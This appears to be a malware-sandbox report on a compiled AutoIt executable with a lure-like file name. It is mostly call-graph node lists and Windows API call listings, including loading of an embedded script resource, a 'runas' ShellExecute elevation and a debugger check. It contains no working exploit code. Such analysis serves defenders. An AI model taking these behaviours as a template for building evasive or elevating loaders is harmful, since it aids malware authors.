93718->93698 93719->93716 93720 3b5884 WriteConsoleW CreateFileW __chsize_nolock 93720->93726 93721->93700 93721->93702 93721->93714 93721->93722 93722->93700 93723->93700 93725 3ab2ca WriteFile 93723->93725 93724->93716 93725->93690 93725->93726 93726->93690 93726->93700 93726->93716 93726->93720 93727 3ab321 WriteFile 93726->93727 93727->93690 93727->93726 93728->93637 93729->93643 93730->93652 93731->93651 93732->93643 93733->93638 93734->93644 93735->93643 93736->93602 93737->93604 93760 3aaba4 93738->93760 93740 3aeb00 93773 3aab1e 48 API calls 2 library calls 93740->93773 93742 3aeaaa 93742->93740 93743 3aeade 93742->93743 93745 3aaba4 __lseeki64_nolock 47 API calls 93742->93745 93743->93740 93746 3aaba4 __lseeki64_nolock 47 API calls 93743->93746 93744 3aeb08 93747 3aeb2a 93744->93747 93774 3a7bed 47 API calls 3 library calls 93744->93774 93748 3aead5 93745->93748 93749 3aeaea CloseHandle 93746->93749 93747->93626 93751 3aaba4 __lseeki64_nolock 47 API calls 93748->93751 93749->93740 93752 3aeaf6 GetLastError 93749->93752 93751->93743 93752->93740 93753->93611 93754->93624 93755->93626 93756->93624 93757->93614 93758->93618 93759->93624 93761 3aabaf 93760->93761 93762 3aabc4 93760->93762 93763 3a7bda __lseeki64 47 API calls 93761->93763 93765 3a7bda __lseeki64 47 API calls 93762->93765 93767 3aabe9 93762->93767 93764 3aabb4 93763->93764 93766 3a7c0e __wtof_l 47 API calls 93764->93766 93768 3aabf3 93765->93768 93770 3aabbc 93766->93770 93767->93742 93769 3a7c0e __wtof_l 47 API calls 93768->93769 93771 3aabfb 93769->93771 93770->93742 93772 3a6e10 __wtof_l 8 API calls 93771->93772 93772->93770 93773->93744 93774->93747 93775->93204 93776->93213 93777->93213 93778->93214 93779->93227 93780->93229 93781->93226 93782->93234 93783->93240 93784->93255 93785->93253 93787 3af8a0 __ftell_nolock 93786->93787 93788 3840b4 GetLongPathNameW 93787->93788 93789 386a63 48 API calls 93788->93789 93790 3840dc 93789->93790 93791 3849a0 93790->93791 93792 38d7f7 48 API calls 
93791->93792 93793 3849b2 93792->93793 93794 38660f 49 API calls 93793->93794 93795 3849bd 93794->93795 93796 3849c8 93795->93796 93797 3f2e35 93795->93797 93799 3864cf 48 API calls 93796->93799 93802 3f2e4f 93797->93802 93844 39d35e 60 API calls 93797->93844 93800 3849d4 93799->93800 93838 3828a6 93800->93838 93803 3849e7 Mailbox 93803->93068 93805 3841a9 136 API calls 93804->93805 93806 38415e 93805->93806 93807 3f3489 93806->93807 93809 3841a9 136 API calls 93806->93809 93808 3cc396 122 API calls 93807->93808 93810 3f349e 93808->93810 93811 384172 93809->93811 93812 3f34bf 93810->93812 93813 3f34a2 93810->93813 93811->93807 93814 38417a 93811->93814 93816 39f4ea 48 API calls 93812->93816 93815 384252 84 API calls 93813->93815 93817 3f34aa 93814->93817 93818 384186 93814->93818 93815->93817 93831 3f3504 Mailbox 93816->93831 93933 3c6b49 87 API calls _wprintf 93817->93933 93845 38c833 93818->93845 93821 3f34b8 93821->93812 93823 3f36b4 93824 3a1c9d _free 47 API calls 93823->93824 93825 3f36bc 93824->93825 93826 384252 84 API calls 93825->93826 93832 3f36c5 93826->93832 93830 3a1c9d _free 47 API calls 93830->93832 93831->93823 93831->93832 93835 38ce19 48 API calls 93831->93835 93934 3c2551 48 API calls _memcpy_s 93831->93934 93935 3c2472 60 API calls 2 library calls 93831->93935 93936 3c9c12 48 API calls 93831->93936 93937 38ba85 48 API calls _memcpy_s 93831->93937 93938 384dd9 48 API calls 93831->93938 93832->93830 93834 384252 84 API calls 93832->93834 93939 3c25b5 86 API calls 4 library calls 93832->93939 93834->93832 93835->93831 93839 3828b8 93838->93839 93843 3828d7 _memcpy_s 93838->93843 93841 39f4ea 48 API calls 93839->93841 93840 39f4ea 48 API calls 93842 3828ee 93840->93842 93841->93843 93842->93803 93843->93840 93844->93797 93846 38c843 __ftell_nolock 93845->93846 93847 38c860 93846->93847 93848 3f3095 93846->93848 93945 3848ba 49 API calls 93847->93945 93964 3c25b5 86 API calls 4 library calls 93848->93964 93851 3f30a8 93965 3c25b5 86 API calls 4 
library calls 93851->93965 93852 38c882 93946 384550 56 API calls 93852->93946 93854 38c897 93854->93851 93856 38c89f 93854->93856 93858 38d7f7 48 API calls 93856->93858 93857 3f30c4 93860 38c90c 93857->93860 93859 38c8ab 93858->93859 93947 39e968 49 API calls __ftell_nolock 93859->93947 93862 38c91a 93860->93862 93863 3f30d7 93860->93863 93950 3a1dfc 93862->93950 93866 384907 CloseHandle 93863->93866 93864 38c8b7 93867 38d7f7 48 API calls 93864->93867 93868 3f30e3 93866->93868 93869 38c8c3 93867->93869 93870 3841a9 136 API calls 93868->93870 93871 38660f 49 API calls 93869->93871 93872 3f310d 93870->93872 93873 38c8d1 93871->93873 93876 3f3136 93872->93876 93880 3cc396 122 API calls 93872->93880 93948 39eb66 SetFilePointerEx ReadFile 93873->93948 93875 38c943 _wcscat _wcscpy 93879 38c96d SetCurrentDirectoryW 93875->93879 93966 3c25b5 86 API calls 4 library calls 93876->93966 93877 38c8fd 93949 3846ce SetFilePointerEx SetFilePointerEx 93877->93949 93883 39f4ea 48 API calls 93879->93883 93884 3f3129 93880->93884 93882 3f314d 93917 38cad1 Mailbox 93882->93917 93885 38c988 93883->93885 93886 3f3152 93884->93886 93887 3f3131 93884->93887 93890 3847b7 48 API calls 93885->93890 93889 384252 84 API calls 93886->93889 93888 384252 84 API calls 93887->93888 93888->93876 93891 3f3157 93889->93891 93920 38c993 Mailbox __NMSG_WRITE 93890->93920 93892 39f4ea 48 API calls 93891->93892 93899 3f3194 93892->93899 93893 38ca9d 93960 384907 93893->93960 93897 383d98 93897->92942 93897->92965 93898 38caa9 SetCurrentDirectoryW 93898->93917 93967 38ba85 48 API calls _memcpy_s 93899->93967 93903 3f33ce 93973 3c9b72 48 API calls 93903->93973 93904 3f3467 93977 3c25b5 86 API calls 4 library calls 93904->93977 93908 3f3480 93908->93893 93909 3f33f0 93974 3e29e8 48 API calls _memcpy_s 93909->93974 93911 3f33fd 93913 3a1c9d _free 47 API calls 93911->93913 93912 3f345f 93976 3c240b 48 API calls 3 library calls 93912->93976 93913->93917 93915 38ce19 48 API calls 93915->93920 93940 3848dd 
93917->93940 93920->93893 93920->93904 93920->93912 93920->93915 93953 38b337 56 API calls _wcscpy 93920->93953 93954 39c258 GetStringTypeW 93920->93954 93955 38cb93 59 API calls __wcsnicmp 93920->93955 93956 38cb5a GetStringTypeW __NMSG_WRITE 93920->93956 93957 3a16d0 GetStringTypeW __wtof_l 93920->93957 93958 38cc24 162 API calls 3 library calls 93920->93958 93959 39c682 48 API calls 93920->93959 93921 3f31dd Mailbox 93921->93903 93925 38ce19 48 API calls 93921->93925 93928 3f3420 93921->93928 93968 3c2551 48 API calls _memcpy_s 93921->93968 93969 3c2472 60 API calls 2 library calls 93921->93969 93970 3c9c12 48 API calls 93921->93970 93971 38ba85 48 API calls _memcpy_s 93921->93971 93972 39c682 48 API calls 93921->93972 93925->93921 93975 3c25b5 86 API calls 4 library calls 93928->93975 93930 3f3439 93931 3a1c9d _free 47 API calls 93930->93931 93932 3f344c 93931->93932 93932->93917 93933->93821 93934->93831 93935->93831 93936->93831 93937->93831 93938->93831 93939->93832 93941 384907 CloseHandle 93940->93941 93942 3848e5 Mailbox 93941->93942 93943 384907 CloseHandle 93942->93943 93944 3848fc 93943->93944 93944->93897 93945->93852 93946->93854 93947->93864 93948->93877 93949->93860 93978 3a1e46 93950->93978 93953->93920 93954->93920 93955->93920 93956->93920 93957->93920 93958->93920 93959->93920 93961 384920 93960->93961 93962 384911 93960->93962 93961->93962 93963 384925 CloseHandle 93961->93963 93962->93898 93963->93962 93964->93851 93965->93857 93966->93882 93967->93921 93968->93921 93969->93921 93970->93921 93971->93921 93972->93921 93973->93909 93974->93911 93975->93930 93976->93904 93977->93908 93980 3a1e61 93978->93980 93982 3a1e55 93978->93982 94002 3a7c0e 47 API calls __getptd_noexit 93980->94002 93981 3a2019 93984 3a1e41 93981->93984 94003 3a6e10 8 API calls __wtof_l 93981->94003 93982->93980 93990 3a1ed4 93982->93990 93997 3a9d6b 47 API calls __wtof_l 93982->93997 93984->93875 93986 3a1fa0 93986->93980 93986->93984 93989 3a1fb0 93986->93989 93987 
3a1f5f 93987->93980 93988 3a1f7b 93987->93988 93999 3a9d6b 47 API calls __wtof_l 93987->93999 93988->93980 93988->93984 93993 3a1f91 93988->93993 94001 3a9d6b 47 API calls __wtof_l 93989->94001 93990->93980 93996 3a1f41 93990->93996 93998 3a9d6b 47 API calls __wtof_l 93990->93998 94000 3a9d6b 47 API calls __wtof_l 93993->94000 93996->93986 93996->93987 93997->93990 93998->93996 93999->93988 94000->93984 94001->93984 94002->93981 94003->93984 94005 384c8b 94004->94005 94009 384d94 94004->94009 94006 39f4ea 48 API calls 94005->94006 94005->94009 94007 384cb2 94006->94007 94008 39f4ea 48 API calls 94007->94008 94014 384d22 94008->94014 94009->93074 94014->94009 94017 38b470 94014->94017 94045 384dd9 48 API calls 94014->94045 94046 3c9af1 48 API calls 94014->94046 94047 38ba85 48 API calls _memcpy_s 94014->94047 94015->93076 94016->93078 94048 386b0f 94017->94048 94019 38b69b 94055 38ba85 48 API calls _memcpy_s 94019->94055 94021 38b6b5 Mailbox 94021->94014 94024 3f397b 94059 3c26bc 88 API calls 4 library calls 94024->94059 94025 38ba85 48 API calls 94036 38b495 94025->94036 94028 38b9e4 94061 3c26bc 88 API calls 4 library calls 94028->94061 94029 3f3973 94029->94021 94032 38bcce 48 API calls 94032->94036 94033 3f3989 94060 38ba85 48 API calls _memcpy_s 94033->94060 94035 3f3909 94038 386b4a 48 API calls 94035->94038 94036->94019 94036->94024 94036->94025 94036->94028 94036->94032 94036->94035 94037 38bb85 48 API calls 94036->94037 94041 38bdfa 48 API calls 94036->94041 94044 3f3939 _memcpy_s 94036->94044 94053 38c413 59 API calls 94036->94053 94054 38bc74 48 API calls 94036->94054 94056 38c6a5 49 API calls 94036->94056 94057 38c799 48 API calls _memcpy_s 94036->94057 94037->94036 94040 3f3914 94038->94040 94043 39f4ea 48 API calls 94040->94043 94042 38b66c CharUpperBuffW 94041->94042 94042->94036 94043->94044 94058 3c26bc 88 API calls 4 library calls 94044->94058 94045->94014 94046->94014 94047->94014 94049 39f4ea 48 API calls 94048->94049 94050 386b34 94049->94050 
94051 386b4a 48 API calls 94050->94051 94052 386b43 94051->94052 94052->94036 94053->94036 94054->94036 94055->94021 94056->94036 94057->94036 94058->94029 94059->94033 94060->94029 94061->94029 94063 3f418d EnumResourceNamesW 94062->94063 94064 38403c LoadImageW 94062->94064 94065 383ee1 RegisterClassExW 94063->94065 94064->94065 94066 383f53 7 API calls 94065->94066 94066->93093 94068 3f3c33 94067->94068 94069 384c44 94067->94069 94068->94069 94070 3f3c3c DestroyIcon 94068->94070 94069->93099 94093 3c5819 61 API calls _W_store_winword 94069->94093 94070->94069 94072 3851cb 94071->94072 94073 3852a2 Mailbox 94071->94073 94074 386b0f 48 API calls 94072->94074 94073->93104 94075 3851d9 94074->94075 94076 3f3ca1 LoadStringW 94075->94076 94077 3851e6 94075->94077 94080 3f3cbb 94076->94080 94078 386a63 48 API calls 94077->94078 94079 3851fb 94078->94079 94079->94080 94081 38520c 94079->94081 94082 38510d 48 API calls 94080->94082 94083 385216 94081->94083 94084 3852a7 94081->94084 94087 3f3cc5 94082->94087 94088 38518c 48 API calls 94087->94088 94093->93099 94095 38ef1d 94094->94095 94096 38ef2f 94094->94096 94095->93165 94304 3ccc5c 86 API calls 4 library calls 94096->94304 94098 3f86f9 94098->94098 94100 38f130 94099->94100 94102 38fe30 335 API calls 94100->94102 94104 38f199 94100->94104 94101 38f3dd 94106 3f87c8 94101->94106 94116 38f3f2 94101->94116 94147 38f431 Mailbox 94101->94147 94105 3f8728 94102->94105 94103 38f595 94110 38d7f7 48 API calls 94103->94110 94103->94147 94104->94101 94104->94103 94112 38d7f7 48 API calls 94104->94112 94148 38f229 94104->94148 94105->94104 94306 3ccc5c 86 API calls 4 library calls 94105->94306 94309 3ccc5c 86 API calls 4 library calls 94106->94309 94107 38fe30 335 API calls 94107->94147 94111 3f87a3 94110->94111 94308 3a0f0a 52 API calls __cinit 94111->94308 94113 3f8772 94112->94113 94307 3a0f0a 52 API calls __cinit 94113->94307 94114 3ccc5c 86 API calls 94114->94147 94142 38f418 94116->94142 94310 3c9af1 48 API calls 
94116->94310 94117 3f8b1b 94127 3f8bcf 94117->94127 94128 3f8b2c 94117->94128 94119 38d6e9 55 API calls 94119->94147 94121 38f770 94123 3f8a45 94121->94123 94141 38f77a 94121->94141 94122 3f8b7e 94319 3de40a 335 API calls Mailbox 94122->94319 94316 39c1af 48 API calls 94123->94316 94124 3f8c53 94324 3ccc5c 86 API calls 4 library calls 94124->94324 94125 3f8810 94311 3deef8 335 API calls 94125->94311 94126 38fe30 335 API calls 94143 38f6aa 94126->94143 94321 3ccc5c 86 API calls 4 library calls 94127->94321 94318 3df5ee 335 API calls 94128->94318 94129 3f8beb 94322 3dbdbd 335 API calls Mailbox 94129->94322 94136 391b90 48 API calls 94136->94147 94139 391b90 48 API calls 94139->94147 94140 3f8c00 94163 38f537 Mailbox 94140->94163 94323 3ccc5c 86 API calls 4 library calls 94140->94323 94141->94139 94142->94117 94142->94143 94142->94147 94143->94121 94143->94126 94144 38fce0 94143->94144 94143->94147 94143->94163 94144->94163 94320 3ccc5c 86 API calls 4 library calls 94144->94320 94146 3f8823 94146->94142 94151 3f884b 94146->94151 94147->94107 94147->94114 94147->94119 94147->94122 94147->94124 94147->94129 94147->94136 94147->94144 94147->94163 94305 38dd47 48 API calls _memcpy_s 94147->94305 94317 3b97ed InterlockedDecrement 94147->94317 94325 39c1af 48 API calls 94147->94325 94148->94101 94148->94103 94148->94142 94148->94147 94312 3dccdc 48 API calls 94151->94312 94163->93165 94165 39479f 94164->94165 94166 394637 94164->94166 94169 38ce19 48 API calls 94165->94169 94167 3f6e05 94166->94167 94168 394643 94166->94168 94380 3de822 94167->94380 94379 394300 335 API calls _memcpy_s 94168->94379 94176 3946e4 Mailbox 94169->94176 94172 3f6e11 94173 394739 Mailbox 94172->94173 94420 3ccc5c 86 API calls 4 library calls 94172->94420 94173->93165 94175 394659 94175->94172 94175->94173 94175->94176 94179 384252 84 API calls 94176->94179 94326 3cfa0c 94176->94326 94367 3d6ff0 94176->94367 94376 3c6524 94176->94376 94179->94173 94182 39e253 94181->94182 94183 3fdf42 94181->94183 
94182->93165 94184 3fdf77 94183->94184 94185 3fdf59 TranslateAcceleratorW 94183->94185 94185->94182 94187 39dca3 94186->94187 94189 39dc71 94186->94189 94187->93165 94188 39dc96 IsDialogMessageW 94188->94187 94188->94189 94189->94187 94189->94188 94190 3fdd1d GetClassLongW 94189->94190 94190->94188 94190->94189 94191->93165 94534 38bd30 94192->94534 94194 393267 94195 3932f8 94194->94195 94196 3f907a 94194->94196 94260 393628 94194->94260 94546 39c36b 86 API calls 94195->94546 94552 3ccc5c 86 API calls 4 library calls 94196->94552 94200 3f94df 94200->94260 94569 3ccc5c 86 API calls 4 library calls 94200->94569 94202 39c3c3 48 API calls 94243 3934eb _memcpy_s Mailbox 94202->94243 94203 393313 94203->94200 94203->94243 94203->94260 94539 382b7a 94203->94539 94207 3f926d 94561 3ccc5c 86 API calls 4 library calls 94207->94561 94208 3f909a 94211 38d645 53 API calls 94208->94211 94250 3f91fa 94208->94250 94210 38fe30 335 API calls 94212 3f9407 94210->94212 94213 3f910c 94211->94213 94223 38d6e9 55 API calls 94212->94223 94212->94260 94217 3f9114 94213->94217 94218 3f9220 94213->94218 94228 3f9438 94223->94228 94566 3ccc5c 86 API calls 4 library calls 94228->94566 94230 38fe30 335 API calls 94230->94243 94236 39351f 94251 386eed 48 API calls 94236->94251 94252 393540 94236->94252 94243->94202 94243->94207 94243->94208 94243->94228 94243->94230 94243->94236 94247 39f4ea 48 API calls 94243->94247 94253 3f9394 94243->94253 94256 3f93c5 94243->94256 94243->94260 94548 38d9a0 53 API calls __cinit 94243->94548 94549 38d8c0 53 API calls 94243->94549 94550 39c2d6 48 API calls _memcpy_s 94243->94550 94562 3dcda2 82 API calls Mailbox 94243->94562 94563 3c80e3 53 API calls 94243->94563 94564 38d764 55 API calls 94243->94564 94565 38dcae 50 API calls Mailbox 94243->94565 94247->94243 94557 3ccc5c 86 API calls 4 library calls 94250->94557 94251->94252 94257 3f94b0 94252->94257 94259 393585 94252->94259 94252->94260 94255 39f4ea 48 API calls 94253->94255 94255->94256 94256->94210 
94259->94200 94259->94260 94263 393635 Mailbox 94260->94263 94551 3ccc5c 86 API calls 4 library calls 94260->94551 94263->93165 94264->93120 94265->93112 94266->93117 94267->93165 94268->93165 94269->93161 94270->93161 94271->93161 94273 38fe50 94272->94273 94298 38fe7e 94272->94298 94274 39f4ea 48 API calls 94273->94274 94274->94298 94275 39146e 94276 386eed 48 API calls 94275->94276 94296 38ffe1 94276->94296 94277 38d7f7 48 API calls 94277->94298 94278 390509 94576 3ccc5c 86 API calls 4 library calls 94278->94576 94280 39f4ea 48 API calls 94280->94298 94282 386eed 48 API calls 94282->94298 94284 391473 94575 3ccc5c 86 API calls 4 library calls 94284->94575 94285 3fa246 94289 386eed 48 API calls 94285->94289 94286 3fa922 94286->93165 94289->94296 94290 3fa873 94290->93165 94291 3fa30e 94291->94296 94573 3b97ed InterlockedDecrement 94291->94573 94292 3a0f0a 52 API calls __cinit 94292->94298 94294 3b97ed InterlockedDecrement 94294->94298 94295 3fa973 94577 3ccc5c 86 API calls 4 library calls 94295->94577 94296->93165 94298->94275 94298->94277 94298->94278 94298->94280 94298->94282 94298->94284 94298->94285 94298->94291 94298->94292 94298->94294 94298->94295 94298->94296 94300 3915b5 94298->94300 94571 391820 335 API calls 2 library calls 94298->94571 94572 391d10 59 API calls Mailbox 94298->94572 94299 3fa982 94574 3ccc5c 86 API calls 4 library calls 94300->94574 94301->93161 94302->93161 94303->93161 94304->94098 94305->94147 94306->94104 94307->94148 94308->94147 94309->94163 94310->94125 94311->94146 94316->94147 94317->94147 94318->94147 94319->94144 94320->94163 94321->94163 94322->94140 94323->94163 94324->94163 94325->94147 94327 3cfa1c __ftell_nolock 94326->94327 94328 3cfa44 94327->94328 94482 38d286 48 API calls 94327->94482 94330 38936c 81 API calls 94328->94330 94331 3cfa5e 94330->94331 94332 3cfb68 94331->94332 94333 3cfa80 94331->94333 94343 3cfb92 94331->94343 94334 3841a9 136 API calls 94332->94334 94335 38936c 81 API calls 94333->94335 94343->94173 
94368 38936c 81 API calls 94367->94368 94369 3d702a 94368->94369 94370 38b470 91 API calls 94369->94370 94371 3d703a 94370->94371 94372 3d705f 94371->94372 94373 38fe30 335 API calls 94371->94373 94375 3d7063 94372->94375 94521 38cdb9 48 API calls 94372->94521 94373->94372 94375->94173 94522 3c6ca9 GetFileAttributesW 94376->94522 94379->94175 94381 3de84e 94380->94381 94382 3de868 94380->94382 94526 3ccc5c 86 API calls 4 library calls 94381->94526 94527 3dccdc 48 API calls 94382->94527 94385 3de871 94386 38fe30 334 API calls 94385->94386 94387 3de8cf 94386->94387 94388 3de96a 94387->94388 94390 3de916 94387->94390 94419 3de860 Mailbox 94387->94419 94389 3de978 94388->94389 94392 3de9c7 94388->94392 94528 3c9b72 48 API calls 94390->94528 94392->94419 94394 3de949 94419->94172 94420->94173 94482->94328 94521->94375 94523 3c6529 94522->94523 94524 3c6cc4 FindFirstFileW 94522->94524 94523->94173 94524->94523 94525 3c6cd9 FindClose 94524->94525 94525->94523 94526->94419 94527->94385 94528->94394 94535 38bd3f 94534->94535 94538 38bd5a 94534->94538 94536 38bdfa 48 API calls 94535->94536 94537 38bd47 CharUpperBuffW 94536->94537 94537->94538 94538->94194 94540 382b8b 94539->94540 94541 3f436a 94539->94541 94542 39f4ea 48 API calls 94540->94542 94543 382b92 94542->94543 94546->94203 94548->94243 94549->94243 94550->94243 94551->94263 94552->94203 94557->94260 94561->94260 94562->94243 94563->94243 94564->94243 94565->94243 94566->94260 94569->94260 94571->94298 94572->94298 94573->94296 94574->94296 94575->94290 94576->94286 94577->94299 94578 38f030 94581 393b70 94578->94581 94580 38f03c 94582 393bc8 94581->94582 94603 3942a5 94581->94603 94583 393bef 94582->94583 94584 3f6fd1 94582->94584 94587 3f6f7e 94582->94587 94594 3f6f9b 94582->94594 94585 39f4ea 48 API calls 94583->94585 94661 3dceca 335 API calls Mailbox 94584->94661 94586 393c18 94585->94586 94589 39f4ea 48 API calls 94586->94589 94587->94583 94590 3f6f87 94587->94590 94628 393c2c _memcpy_s __NMSG_WRITE 
94589->94628 94658 3dd552 335 API calls Mailbox 94590->94658 94591 3f6fbe 94660 3ccc5c 86 API calls 4 library calls 94591->94660 94594->94591 94659 3dda0e 335 API calls 2 library calls 94594->94659 94595 3942f2 94680 3ccc5c 86 API calls 4 library calls 94595->94680 94598 3f73b0 94598->94580 94599 3f737a 94679 3ccc5c 86 API calls 4 library calls 94599->94679 94600 3f7297 94669 3ccc5c 86 API calls 4 library calls 94600->94669 94673 3ccc5c 86 API calls 4 library calls 94603->94673 94605 3940df 94670 3ccc5c 86 API calls 4 library calls 94605->94670 94607 3f707e 94662 3ccc5c 86 API calls 4 library calls 94607->94662 94609 39dce0 53 API calls 94609->94628 94610 38d6e9 55 API calls 94610->94628 94613 38d645 53 API calls 94613->94628 94616 3f72d2 94671 3ccc5c 86 API calls 4 library calls 94616->94671 94618 3f7350 94677 3ccc5c 86 API calls 4 library calls 94618->94677 94620 38fe30 335 API calls 94620->94628 94621 3f7363 94678 3ccc5c 86 API calls 4 library calls 94621->94678 94623 3f72e9 94672 3ccc5c 86 API calls 4 library calls 94623->94672 94626 386a63 48 API calls 94626->94628 94628->94595 94628->94599 94628->94600 94628->94603 94628->94605 94628->94607 94628->94609 94628->94610 94628->94613 94628->94616 94628->94618 94628->94620 94628->94621 94628->94623 94628->94626 94629 39f4ea 48 API calls 94628->94629 94630 39c050 48 API calls 94628->94630 94631 3f714c 94628->94631 94632 38d286 48 API calls 94628->94632 94634 3f733f 94628->94634 94637 386eed 48 API calls 94628->94637 94639 393f2b 94628->94639 94643 39ee75 48 API calls 94628->94643 94651 3f71e1 94628->94651 94653 38d9a0 53 API calls __cinit 94628->94653 94654 38d83d 53 API calls 94628->94654 94655 38cdb9 48 API calls 94628->94655 94656 39c15c 48 API calls 94628->94656 94657 39becb 335 API calls 94628->94657 94663 38dcae 50 API calls Mailbox 94628->94663 94664 3dccdc 48 API calls 94628->94664 94665 3ca1eb 50 API calls 94628->94665 94629->94628 94630->94628 94666 3dccdc 48 API calls 94631->94666 94632->94628 94676 

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00383AA3,?), ref: 00383D45
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00383AA3,?), ref: 00383D57
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00441148,00441130,?,?,?,?,00383AA3,?), ref: 00383DC8
                                                                                          • Part of subcall function 00386430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00383DEE,00441148,?,?,?,?,?,00383AA3,?), ref: 00386471
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00383AA3,?), ref: 00383E48
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004328F4,00000010), ref: 003F1CCE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00441148,?,?,?,?,?,00383AA3,?), ref: 003F1D06
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0041DAB4,00441148,?,?,?,?,?,00383AA3,?), ref: 003F1D89
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00383AA3), ref: 003F1D90
                                                                                          • Part of subcall function 00383E6E: GetSysColorBrush.USER32(0000000F), ref: 00383E79
                                                                                          • Part of subcall function 00383E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00383E88
                                                                                          • Part of subcall function 00383E6E: LoadIconW.USER32(00000063), ref: 00383E9E
                                                                                          • Part of subcall function 00383E6E: LoadIconW.USER32(000000A4), ref: 00383EB0
                                                                                          • Part of subcall function 00383E6E: LoadIconW.USER32(000000A2), ref: 00383EC2
                                                                                          • Part of subcall function 00383E6E: RegisterClassExW.USER32(?), ref: 00383F30
                                                                                          • Part of subcall function 003836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003836E6
                                                                                          • Part of subcall function 003836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383707
                                                                                          • Part of subcall function 003836B8: ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 0038371B
                                                                                          • Part of subcall function 003836B8: ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 00383724
                                                                                          • Part of subcall function 00384FFC: _memset.LIBCMT ref: 00385022
                                                                                          • Part of subcall function 00384FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003850CB
                                                                                        Similarity
                                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                        • String ID: ()C$This is a third-party compiled AutoIt script.$runas

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0039DDEC
                                                                                        • GetCurrentProcess.KERNEL32(00000000,0041DC38,?,?), ref: 0039DEAC
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,0041DC38,?,?), ref: 0039DF01
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0039DF0C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0039DF1F
                                                                                        • GetSystemInfo.KERNEL32(?,0041DC38,?,?), ref: 0039DF29
                                                                                        • GetSystemInfo.KERNEL32(?,0041DC38,?,?), ref: 0039DF35
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1148 38406b-384083 CreateStreamOnHGlobal 1149 3840a3-3840a6 1148->1149 1150 384085-38409c FindResourceExW 1148->1150 1151 3f4f16-3f4f25 LoadResource 1150->1151 1152 3840a2 1150->1152 1151->1152 1153 3f4f2b-3f4f39 SizeofResource 1151->1153 1152->1149 1153->1152 1154 3f4f3f-3f4f4a LockResource 1153->1154 1154->1152 1155 3f4f50-3f4f6e 1154->1155 1155->1152
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0038449E,?,?,00000000,00000001), ref: 0038407B
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0038449E,?,?,00000000,00000001), ref: 00384092
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,0038449E,?,?,00000000,00000001,?,?,?,?,?,?,003841FB), ref: 003F4F1A
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,0038449E,?,?,00000000,00000001,?,?,?,?,?,?,003841FB), ref: 003F4F2F
                                                                                        • LockResource.KERNEL32(0038449E,?,?,0038449E,?,?,00000000,00000001,?,?,?,?,?,?,003841FB,00000000), ref: 003F4F42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID: @$ D$ D$ D
                                                                                        • API String ID: 3728558374-1500609730
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,003F2F49), ref: 003C6CB9
                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 003C6CCA
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C6CDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        Strings
